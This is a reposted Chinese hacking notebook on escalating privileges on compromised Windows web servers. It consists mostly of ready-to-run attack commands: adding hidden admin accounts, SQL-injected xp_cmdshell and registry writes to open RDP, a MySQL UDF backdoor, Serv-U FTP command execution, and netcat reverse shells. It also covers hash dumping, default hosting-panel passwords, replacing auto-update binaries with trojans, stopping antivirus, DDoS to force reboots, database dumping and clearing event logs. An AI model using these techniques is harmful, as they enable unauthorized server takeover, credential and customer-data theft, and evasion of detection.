WEB提權

本文轉自《劍眉大俠提權筆記》，個人覺得思路想法很好，就轉載了，其中藍色字體爲本人筆記

1.能不能執行cmd就看這個命令：net user，net不行就用net1，再不行就上傳一個net到可寫可讀目錄，執行/c c:\windows\temp\cookies\net1.exe user

注：若net被禁用，可使用aio工具，可進行賬戶的克隆，該工具還有很多用戶，請自行了解

2.當提權成功，3389沒開的情況下，上傳開3389的vps沒成功時，試試上傳rootkit.asp 用剛提權的用戶登錄進去就是system權限，再試試一般就可以了。
3.cmd拒絕訪問的話就自己上傳一個cmd.exe 自己上傳的後綴是不限制後綴的，cmd.exe/cmd.com/cmd.txt 都可以。
4.cmd命令：systeminfo，看看有沒有KB952004、KB956572、KB970483這三個補丁，如果沒有，第一個是pr提權，第二個是巴西烤肉提權，第三個是iis6.0提權。
6.c:\windows\temp\cookies\ 這個目錄
7.找sa密碼或是root密碼，直接利用大馬的文件搜索功能直接搜索，超方便！
8.cmd執行exp沒回顯的解決方法：com路徑那裏輸入exp路徑C:\RECYCLER\pr.exe，命令那裏清空(包括/c )輸入”net user jianmei daxia /add”
9.增加用戶並提升爲管理員權限之後，如果連接不上3389，上傳rootkit.asp腳本，訪問會提示登錄，用提權成功的賬號密碼登錄進去就可以擁有管理員權限了。
10.有時變態監控不讓添加用戶，可以嘗試抓管理哈希值，上傳“PwDump7 破解當前管理密碼(hash值)”，倆個都上傳，執行PwDump7.exe就可以了，之後到網站去解密即可。
11.有時增加不上用戶，有可能是密碼過於簡單或是過於複雜，還有就是殺軟的攔截，命令 tasklist 查看進程
12.其實星外提權只要一個可執行的文件即可，先運行一遍cmd，之後把星外ee.exe命名爲log.csv 就可以執行了。
13.用wt.asp掃出來的目錄，其中紅色的文件可以替換成exp，執行命令時cmd那裏輸入替換的文件路徑，下面清空雙引號加增加用戶的命令。
14.提權很無奈的時候，可以試試TV遠控，通殺內外網，穿透防火牆，很強大的。
15.當可讀可寫目錄存在空格的時候，會出現這樣的情況：’C:\Documents’ 不是內部或外部命令，也不是可運行的程序 或批處理文件。解決辦法是利用菜刀的交互shell切換到exp路徑，如：Cd C:\Documents and Settings\All Users\Application Data\Microsoft 目錄 然後再執行exp或者cmd，就不會存在上面的情況了，aspshell一般是無法跳轉目錄的～
16.有時候可以添加用戶，但是添加不到管理組，有可能是administrators改名了，net user administrator 看下本地組成員，*administrators
17.進入服務器，可以繼續內網滲透 這個時候可以嘗試打開路由器 默認帳號密碼 admin admin
18.有的cmd執行很變態，asp馬裏，cmd路徑填上面，下面填：”"c:\xxx\exp.exe “whoami” 記得前面加兩個雙引號，不行後面也兩個，不行就把exp的路徑放在cmd那裏，下面不變。
19.一般增加不上用戶，或是想添加增加用戶的vbs,bat,遠控小馬到服務器的啓動項裏，用“直接使服務器藍屏重啓的東東”這個工具可以實現，
20.執行PwDump7.exe抓哈希值的時候，建議重定向結果到保存爲1.txt /c c:\windows\temp\cookies\PwDump7.exe >1.txt
21.菜刀執行的技巧，上傳cmd到可執行目錄，右擊cmd 虛擬終端，help 然後setp c:\windows\temp\cmd.exe 設置終端路徑爲：c:\windows\temp\cmd.exe
22.當不支持aspx，或是支持但跨不了目錄的時候，可以上傳一個讀iis的vps，執行命令列出所有網站目錄，找到主站的目錄就可以跨過去了。 上傳cscript.exe到可執行目錄，接着上傳iispwd.vbs到網站根目錄，cmd命令/c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs
23.如何辨別服務器是不是內網？ 192.168.x.x 172.16.x.x 10.x.x.x
(( dos命令大全 ))
查看版本：ver
查看權限：whoami
查看配置：systeminfo
查看用戶：net user
查看進程：tasklist
查看正在運行的服務：tasklist /svc
查看開放的所有端口：netstat -ano
查詢管理用戶名：query user
查看搭建環境：ftp 127.0.0.1
查看指定服務的路徑：sc qc Mysql
添加一個用戶：net user jianmei daxia.asd /add
提升到管理權限：net localgroup administrators jianmei /add
添加用戶並提升權限：net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
查看制定用戶信息：net user jianmei
查看所有管理權限的用戶：net localgroup administrators
加入遠程桌面用戶組：net localgroup “Remote Desktop Users” jianmei /add
突破最大連接數：mstsc /admin /v:127.0.0.1
刪除用戶：net user jianmei /del
刪除管理員賬戶:net user administrator daxia.asd
更改系統登陸密碼：net password daxia.asd
激活GUEST用戶：net user guest /active:yes
開啓TELNET服務：net start telnet
關閉麥咖啡：net stop “McAfee McShield”
關閉防火牆：net stop sharedaccess
查看當前目錄的所有文件：dir c:\windows\
查看制定文件的內容：type c:\windows\1.asp
把cmd.exe複製到c:\windows的temp目錄下並命名爲cmd.txt：copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt
開3389端口的命令：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看補丁：dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt
(( SQL語句直接開啓3389 ))
3389登陸關鍵註冊表位置：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections
其中鍵值DenyTSConnections 直接控制着3389的開啓和關閉，當該鍵值爲0表示3389開啓，1則表示關閉。
而MSSQL的xp_regwrite的存儲過程可以對註冊進行修改，我們使用這點就可以簡單的修改DenyTSConnections鍵值，從而控制3389的關閉和開啓。
開啓3389的SQL語句： syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
關閉3389的SQL語句： syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,1;–
2003可以實現一句話開3389： reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f
(( 常見殺軟 ))
360tray.exe 360實時保護
ZhuDongFangYu.exe 360主動防禦
KSafeTray.exe 金山衛士 McAfee McShield.exe 麥咖啡
SafeDogUpdateCenter.exe 服務器安全狗
(( windows提權中敏感目錄和敏感註冊表的利用 ))
敏感目錄 目錄權限 提權用途
C:\Program Files\ 默認用戶組users對該目錄擁有查看權 可以查看服務器安裝的應用軟件 C:\Documents and Settings\All Users\「開始」菜單\程序 Everyone擁有查看權限 存放快捷方式，可以下載文件，屬性查看安裝路徑 C:\Documents and Settings\All Users\Documents Everyone完全控制權限 上傳執行cmd及exp C:\windows\system32\inetsrv\ Everyone完全控制權限 上傳執行cmd及exp C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini 默認用戶組users擁有查看權限 安裝mysql時會將root密碼寫入該文件 C:\windows\system32\ 默認用戶組users擁有查看權限 Shift後門一般是在該文件夾，可以下載後門破解密碼 C:\Documents and Settings\All Users\「開始」菜單\程序\啓動 Everyone擁有查看權限 可以嘗試向該目錄寫入vbs或bat，服務器重啓後運行。 C:\RECYCLER\D:\RECYCLER\ Everyone完全控制權限 回收站目錄。常用於執行cmd及exp C:\Program Files\Microsoft SQL Server\ 默認用戶組users對該目錄擁有查看權限 收集mssql相關信息，有時候該目錄也存在可執行權限 C:\Program Files\MySQL\ 默認用戶組users對該目錄擁有查看權限 找到MYSQL目錄中user.MYD裏的root密碼 C:\oraclexe\ 默認用戶組users對該目錄擁有查看權限 可以嘗試利用Oracle的默認賬戶提權 C:\WINDOWS\system32\config 默認用戶組users對該目錄擁有查看權限 嘗試下載sam文件進行破解提權 C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini 默認用戶組users對該目錄擁有查看權限 Remote.ini文件中存放着G6FTP的密碼 c:\Program Files\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\ 默認用戶組users對該目錄擁有查看權限 ServUDaemon.ini 中存儲了虛擬主機網站路徑和密碼 c:\windows\system32\inetsrv\MetaBase.xml 默認用戶組users對該目錄擁有查看權限 IIS配置文件 C:tomcat5.0\conf\resin.conf 默認用戶組users對該目錄擁有查看權限 Tomat存放密碼的位置 C:\ZKEYS\Setup.ini 默認用戶組users對該目錄擁有查看權限 ZKEYS虛擬主機存放密碼的位置
(( 提權中的敏感註冊表位置 ))
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp Mssql端口 HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server DenyTSConnections 遠程終端 值爲0 即爲開啓 HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mssql的註冊表位置 HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 華衆主機註冊表配置位置 HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ serv-u的用戶及密碼（su加密）位置 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\ WinStations\RDP-Tcp 在該註冊表位置PortNumber的值即位3389端口值 HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers mysql管理工具Navicat的註冊表位置，提權運用請谷歌 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters Radmin的配置文件，提權中常將其導出進行進行覆蓋提權 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ IIS註冊表全版本泄漏用戶路徑和FTP用戶名漏洞 HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass 華衆主機在註冊表中保存的mssql、mysql等密碼 HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 星外主機mssql的sa賬號密碼，雙MD5加密 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ControlSet002 星外ftp的註冊表位置，當然也包括ControlSet001、ControlSet003
(( wscript.shell的刪除和恢復 ))
載wscript.shell對象，在cmd下或直接運行：regsvr32 /u %windir%\system32\WSHom.Ocx 卸載FSO對象，在cmd下或直接運行：regsvr32.exe /u %windir%\system32\scrrun.dll 卸載stream對象，在cmd下或直接運行：regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll” 如果想恢復的話只需要去掉/U 即可重新再註冊以上相關ASP組件，這樣子就可以用了
(( 如何找到準確的終端連接端口？))
在aspx大馬裏，點擊“系統信息”第三個就是目前的3389端口
或是執行命令查看正在運行的服務：tasklist /svc
找到：svchost.exe 1688 TermService
記住1688這個ID值，
查看開放的所有端口：netstat -ano
找到1688這個ID值所對應的端口就是3389目前的端口
(( iis6提權提示Can not find wmiprvse.exe的突破方法 ))
突破方法一：
在IIS環境下，如果權限做得不嚴格，我們在aspx大馬裏面是有權限直接結束wmiprvse.exe進程的，進程查看裏面直接K掉
在結束之後，它會再次運行，這時候的PID值的不一樣的。這時候我們回來去運行exp，直接秒殺。
突破方法二：
虛擬主機，一般權限嚴格限制的，是沒權限結束的，這時候我們可以考慮配合其他溢出工具讓服務器強制重啓，比如“直接使服務器藍屏重啓的東東”
甚至可以暴力點，DDOS秒殺之，管理髮現服務器不通了首先肯定是以爲服務器死機，等他重啓下服務器（哪怕是IIS重啓下）同樣秒殺之。
(( 本地溢出提權 ))
計算機有個地方叫緩存區,程序的緩存區長度是被事先設定好的,如果用戶輸入的數據超過了這個緩存區的長度,那麼這個程序就會溢出了.
緩存區溢出漏洞主要是由於許多軟件沒有對緩存區檢查而造成的.
利用一些現成的造成溢出漏洞的exploit通過運行,把用戶從users組或其它系統用戶中提升到administrators組.
想要執行cmd命令，就要wscript.shell組建支持，或是支持aspx腳本也行，因爲aspx腳本能調用.net組件來執行cmd的命令.
(( sa提權 ))
掃描開放的端口，1433開了就可以找sa密碼提權，用大馬裏的搜索文件功能，sa密碼一般在conn.asp config.asp web.config 這三個文件
也可以通過註冊表找配置文件，看下支持aspx不，支持的話跨目錄到別的站點上找，找到之後用aspshell自帶的sql提權登錄再執行命令創建用戶即可。
aspx馬提權執行命令有點不一樣，點擊數據庫管理–選MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–輸入帳號密碼連接即可
增加一個用戶：exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;– 提升爲管理員：exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–
PS:如果增加不上，說明是xp_cmdshell組建沒有，增加xp_cmdshell組建：Use master dbcc addextendedproc(‘xp_cmdshell’,'xplog70.dll’)
【 1433一句話開3389 】
Exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–
(( root提權 ))
利用mysql提權的前提就是,服務器安裝了mysql,mysql的服務沒有降權,是默認安裝以系統權限繼承的(system權限). 並且獲得了root的賬號密碼
如何判斷一臺windows服務器上的mysql有沒有降權？ cmd命令net user 如果存在 mysql mssql這樣用戶或者類似的.通常就是它的mssql mysql服務已經被降權運行了
如何判斷服務器上是否開啓了mysql服務？ 開了3306端口，有的管理員會把默認端口改掉.另一個判斷方法就是網站是否支持php,一般支持的話都是用mysql數據庫的.
如何查看root密碼？ 在mysql的安裝目錄下找到user.myd這個文件，root就藏在裏面，一般是40位cmd加密，一些php網站安裝的時候用的是root用戶,在conn.asp config.asp這些文件裏。 有時會顯得很亂，這時就需要自己去組合，前17位在第一行可以找到，還有23位在第三行或是其他行，自己繼續找。
可以直接用php腳本里“mysql執行”，或是上傳個UDF.php，如果網站不支持PHP，可以去旁一個php的站，也可以把UDF.php上傳到別的phpshell上也可以。
填入帳號密碼之後，自然就是安裝DLL了，點擊“自動安裝Mysql BackDoor” 顯示導出跟創建函數成功後，緊接着執行增加用戶的命令即可。
注意：5.0版本以下(包括5.0的)默認c:\windows\系統目錄就可以了，5.1版本以上的不能導出到系統目錄下創建自定義函數，只能導出在mysql安裝目錄下的lib/plugin目錄中
例如：D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll
如果密碼看不見，或是組合不到40位，就本地安裝一個mysql吧， 1、停止mysql服務 2、替換下載下來的3個文件（user.MYI user.MYD user.frm） 3、cmd切換到bin目錄下，進入mysql安全模式，cmd命令：mysqld-nt –skip-grant-tables 4、重新打開一個cmd 切換到bin目錄下，cmd命令：mysql -u root 版本不同有可能是：mysql -uroot -proot 5、最後查詢一下就出來了select user,password from mysql.user;
(( serv-u提權 ))
這個文件裏包含serv-u的md5密碼：C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini
找到這個文件：ServUDaemon.ini 打開找到：LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2
再拿md5密文去解密，再用現在的密碼登陸提權即可。
serv-u提權的前提是43958端口開了，且知道帳號密碼！
如果帳號密碼默認，直接用shell裏面的serv-u提權功能即可搞定，建議用aspx馬、php馬去提權，因爲可以看回顯。
530說明密碼不是默認的,回顯330說明成功，900說明密碼是默認的……………..
在程序裏找個快捷方式，或是相關的文件進行下載到本地，再查看文件的屬性，就可以找到serv-u的安裝目錄了。
目錄有修改權限之serv-u提權：
找到serv-u的目錄，再找到用戶的配置文件ServUDaemon.ini，直接增加一個用戶代碼，保存！
接着本地cmd命令：ftp 服務器ip
回車，輸入帳號密碼再回車………………….
接着先試試普通的cmd命令提權，不行的話就使用ftp提權的命令：
Quote site exec net user jianmei daxia /add 增加一個用戶
Quote site exec net localgroup administrators jianmei /add 提升到管理員權限
200 EXEC command successful (TID=33). 執行成功的回顯信息
Maintenance=System 權限類型多加一行指定新加帳號爲系統管理員
ReloadSettings=True 在修改ini文件後需加入此項，這時serv-u會自動刷新配置文件並生效
(( 端口轉發 ))
什麼情況下適合轉發端口？
1.服務器是內網，我們無法連接。 2.服務器上有防火牆，阻斷我們的連接。
轉發端口的前提，我們是外網或是有外網服務器。
找個可讀可寫目錄上傳lcx.exe
本地cmd命令：lcx.exe -listen 1988 4567 （監聽本地1988端口並轉發到4567端口）
接着shell命令：/c c:\windows\temp\cookies\lcx.exe -slave 本機ip 1988 服務器ip 3389 （把服務器3389端口轉發到本地4567端口）
之後本地連接：127.0.0.1:4567 (如果不想加上:4567的話，本地執行命令的時候，把4567換成3389來執行就行了)
以上是本機外網情況下操作，接着說下在外網服務器裏如何操作：
上傳lxc.exe cmd.exe到服務器且同一目錄，執行cmd.exe命令：lcx.exe -listen 1988 4567
接着在aspxshell裏點擊端口映射，遠程ip改爲站點的ip，遠端口程填1988，點擊映射端口，接着在服務器裏連接127.0.0.1:4567就可以了。
(( nc反彈提權 ))
當可以執行net user，但是不能建立用戶時，就可以用NC反彈提權試下，特別是內網服務器，最好用NC反彈提權。
不過這種方法, 只要對方裝了防火牆, 或是屏蔽掉了除常用的那幾個端口外的所有端口，那麼這種方法也失效了….
找個可讀可寫目錄上傳nc.exe cmd.exe
-l 監聽本地入棧信息
-p port打開本地端口
-t 以telnet形式應答入棧請求
-e 程序重定向
本地cmd執行：nc -vv -l -p 52 進行反彈
接着在shell裏執行命令：c:\windows\temp\nc.exe -vv 服務器ip 999 -e c:\windows\temp\cmd.exe 最好是80或8080這樣的端口，被防火牆攔截的機率小很多
執行成功後本地cmd命令：cd/ （只是習慣而已）
接着以telnet命令連接服務器：telnet 服務器ip 999
回車出現已選定服務器的ip就說明成功了，接着權限比較大了，嘗試建立用戶！
壞蛋： 本地cmd執行：nc -vv -l -p 52 進行反彈 c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe 服務器ip 52
低調小飛： shell執行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe
一般這樣的格式執行成功率很小，不如直接在cmd那裏輸入：c:\windows\temp\nc.exe 命令這裏輸入：-vv 服務器ip 999 -e c:\windows\temp\cmd.exe
這個技巧成功率比上面那個大多了，不單單是nc可以這樣，pr這些提權exp也是可以的。
(( 星外提權 ))
如何知道是不是星外主機？
第一：網站物理路徑存在“freehost” 第二：asp馬裏點擊程序，存在“7i24虛擬主機管理平臺”“星外主機”之類的文件夾
默認帳號：freehostrunat 默認密碼：fa41328538d7be36e83ae91a78a1b16f!7
freehostrunat這個用戶是安裝星外時自動建立的，已屬於administrators管理組，而且密碼不需要解密，直接登錄服務器即可
星外常寫目錄：
C:\RECYCLER\ C:\windows\temp\ e:\recycler\ f:\recycler\ C:\php\PEAR\ C:\WINDOWS\7i24.com\FreeHost C:\php\dev C:\System Volume Information C:\7i24.com\serverdoctor\log\ C:\WINDOWS\Temp\ c:\windows\hchiblis.ibl C:\7i24.com\iissafe\log\ C:\7i24.com\LinkGate\log C:\Program Files\Thunder Network\Thunder7\ C:\Program Files\Thunder Network\Thunder\ C:\Program Files\Symantec AntiVirus\SAVRT\ c:\windows\DriverPacks\C\AM2 C:\Program Files\FlashFXP\ c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\ C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\ c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv c:\Program Files\360\360Safe\deepscan\Section\mutex.db c:\Program Files\Helicon\ISAPI_Rewrite3\error.log c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Validate.dat C:\Program Files\Zend\ZendOptimizer-3.3.0\docs C:\Documents and Settings\All Users\DRM\ C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection C:\Documents and Settings\All Users\Application Data\360safe\softmgr\ C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\
ee提權法：
找個可讀可寫目錄上傳ee.exe
cmd命令：/c c:\windows\temp\cookies\ee.exe -i （獲取星外帳號的id值，例如回顯：FreeHost ID：724）
接着命令：/c c:\windows\temp\cookies\ee.exe -u 724 （獲取星外的帳號密碼）
vbs提權法：
找個可讀可寫目錄上傳cscript.exe iispwd.vbs
cmd命令：/c “c:\windows\temp\cookies\cscript.exe” c:\windows\temp\cookies\iispwd.vbs
意思是讀取iis，這樣一來，不但可以獲取星外的帳號密碼，還可以看到同服務器上的所有站點的目錄。
可行思路大全：
經測試以下目錄中的文件權限均爲everyone，可以修改，可以上傳同文件名替換，刪除，最重要的是還可以執行：
360殺毒db文件替換: c:\Program Files\360\360SD\deepscan\Section\mutex.db c:\Program Files\360\360Safe\deepscan\Section\mutex.db C:\Program Files\360\360Safe\AntiSection\mutex.db
IISrewrite3 文件替換： C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf C:\Program Files\Helicon\ISAPI_Rewrite3\error.log
諾頓殺毒文件替換: c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Persist.Dat
一流過濾相關目錄及文件： C:\7i24.com\iissafe\log\startandiischeck.txt C:\7i24.com\iissafe\log\scanlog.htm
其他: Zend文件替換：C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll 華盾文件替換：C:\WINDOWS\hchiblis.ibl Flash文件替換：C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx DU Meter流量統計信息日誌文件替換：c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
(( 360提權 ))
找個可讀可寫目錄上傳360.exe
cmd命令：/c c:\windows\temp\cookies\360.exe
會提示3段英文： 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 這是成功的徵兆，接着連接服務器連按5下shift鍵，將彈出任務管理器，點擊新建任務：explorer.exe 會出現桌面，接下來大家都會弄了……
(( 搜狗提權 ))
搜狗的目錄默認是可讀可寫的，搜狗每隔一段時間就會自動升級，而升級的文件是pinyinup.exe
我們只要把這個文件替換爲自己的遠控木馬，或是添加賬戶的批處理，等搜狗升級的時候，就可以達成我們的目的了。
(( 華衆虛擬主機提權 ))
就經驗來說，一般溢出提權對虛擬主機是無果的，而且華衆又沒有星外那麼明顯的漏洞。
所以華衆提權關鍵之處就是蒐集信息，主要註冊表位置：
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密碼 HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密碼
c:\windows\temp 下有hzhost主機留下的ftp登陸記錄有用戶名和密碼
以上信息配合hzhosts華衆虛擬主機系統6.x 破解數據庫密碼工具使用
百度搜索：hzhosts華衆虛擬主機系統6.x 破解數據庫密碼工具
(( N點虛擬主機 ))
N點虛擬主機管理系統默認數據庫地址爲：\host_date\#host # date#.mdb
rl直接輸入不行 這裏咱們替換下 #=%23 空格=%20
修改後的下載地址爲/host_date/%23host%20%23%20date%23196.mdb
N點數據庫下載之後找到sitehost表 FTPuser&FTPpass 值 FTPpass是N點加密數據然後用N點解密工具解密得到FTP密碼
N點默認安裝路徑C:\Program Files\NpointSoft\npointhost\web\ D:\Program Files\NpointSoft\npointhost\web\ 默認權限可讀。遇到對方所用虛擬主機是N點時候 可以考慮 讀取該文件夾下載數據庫
N點解密工具代碼 <% set iishost=server.CreateObject(“npoint.host”)
x=iishost.Eduserpassword(“FTPpass值”,0)
response.write x %>
本地搭建N點環境在N點目錄打開訪問即可。得到密碼減去後10位字符即爲 N點的虛擬主機管理密碼。 然後需要在管理系統登陸確認下 在hostcs 表 找到 Hostip 或者hostdomain 一般默認是 Hostip=127.0.0.1 hostdomain=www.npointhost.com 這裏可以不管 因爲 這裏不修改的話就是服務器默認ip地址sitehost 表的host_domain就是綁定的域名 直接查下IP地址即可 咱們批量的話 掃描的地址即可。 管理系統地址即爲IP地址 選擇虛擬主機 登錄即可 接下來傳shell大家應該都會了。 接下來說提權 hostcs表存有sa root賬戶的密碼 解密方法一樣。默認都是 解密結果123456 還有就是在adminlogo 存在N點系統管理密碼 30位的cfs加密可以在http://www.md5.com.cn/cfs 碰撞下試試 或者用asm的工具破解下我的運氣不好沒成功過 3057C0DB854C878E72756088058775 這個是默認admin的密碼
(( 脫庫 ))
asp 程序的網站一般不是access就是msssql，access數據庫脫褲很簡單，直接下載數據庫即可，mssql數據庫可以用shell自帶的脫褲功 能，找到數據庫的連接信息，一般在web.config.asp裏，然後連接一下SA，找到會員表（UserInfo）就可以了。
PHP程序就是mysql了，找到root帳號密碼，用PHP大馬自己帶鏈接功能連接一下，也自己自己上傳PHP脫褲腳本，之後找到目標數據庫（數據庫名），再找到會員表menber進行脫褲即可。
(( 服務器 ))
命令提示符已被系統管理員停用？ 解決方法：運行→gpedit.msc→用戶配置→管理模板→系統，在右側找到”阻止命令提示符”, 然後雙擊一下,在”設置”裏面選中”未配置” ,最後點擊”確定”。
如何判斷服務器的類型？ 解決方法：直接ping服務器ip，看回顯信息進行判斷
TTL=32 9X/ME
TTL=64 linux
TTL=128 2000X/XP
TTL=255 UNIX
爲什麼有時3389開放卻不能連接？ 原因分析：有時候是因爲防火牆，把3389轉發到其他端口就可以連接了，有的轉發後依然是連接不上，那是因爲管理員在TCP/IP裏設置的端口限制 解決方法：我們需要把端口轉爲TCP/IP裏設置的只允許連接的端口其中一個就可以了，更好的辦法是取消端口限制。
最簡單的往服務器上傳東西方法是什麼？ 本機打開“HFS網絡文件服務器”這款工具，把需要上傳的工具直接拖進左邊第一個框內，複製上面的地址，到服務器裏的瀏覽器訪問，就可以下載了
限 制“命令提示符”的運行權限？ 我的電腦（右鍵）–資源管理器中–點擊“工具”按鈕，選擇“文件夾選項”，切換到“查看”標籤，去掉“使用簡單文件共享(推薦)”前面的鉤，這一步是爲了 讓文件的屬性菜單中顯示“安全”標籤，然後進入“c:\windows\system32\”，找到“cmd.exe”，點右鍵選擇“屬性”，切換到“安 全”標籤，將其中“組或用戶名稱”中除了管理員外的所有用戶都刪除，完成後點“確定”這樣當普通用戶想運行“命令提示符”的時候將會出現“拒絕訪問”的警 告框。
如何更改windows2003最大連接數？ windows2003中的遠程桌面功能非常方便，但是初始設置只允許2個用戶同時登陸，有些時候因爲我在公司連接登陸後斷開，同事在家裏用其他用戶登陸 後斷開，當我再進行連接的時候，總是報錯“終端服務超過最大連接數”這時候我和同事都不能登陸，通過以下方法來增加連接數，運 行：services.msc，啓用license logging，別忘了添加完畢後再關閉 License Logging 打開win2k3的控制面板中的“授權”，點“添加許可”輸入要改的連接數
如何清除服務器裏的IP記錄日誌？ 1.我的電腦右鍵管理–事件查看器–安全性–右鍵清除所有事件 2.打開我的電腦–C盤–WINDOWS–system32–config–AppEvent.Evt屬性–安全–全部都拒絕 3.Klaklog.evt屬性–安全–全部都拒絕–SecEvent.Tvt屬性–安全–全部都拒絕